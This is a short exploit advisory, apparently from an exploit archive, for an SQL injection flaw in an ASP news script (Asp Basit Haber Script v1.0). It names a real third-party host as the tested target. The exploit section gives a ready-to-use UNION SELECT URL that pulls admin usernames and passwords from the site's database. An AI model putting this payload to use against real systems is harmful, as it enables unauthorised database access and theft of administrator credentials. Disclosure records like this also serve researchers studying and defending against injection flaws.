# Exploit Title: Asp Basit Haber Script Ver1.0 SQL Injection Vulnerability # Google Dork: n/a # Date: 18.09.2011 #Author: m3rciL3Ss # Software Link:http://www.asprehberi.net/icerik/2479.html #Version:v1.0 # Tested on: http://scripts.ay-computer.de ################################ Exploit:http://scripts.ay-computer.de/haber.asp?id=28' http://scripts.ay-computer.de/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin ################################ Thanks :TuBiGu and Bgh7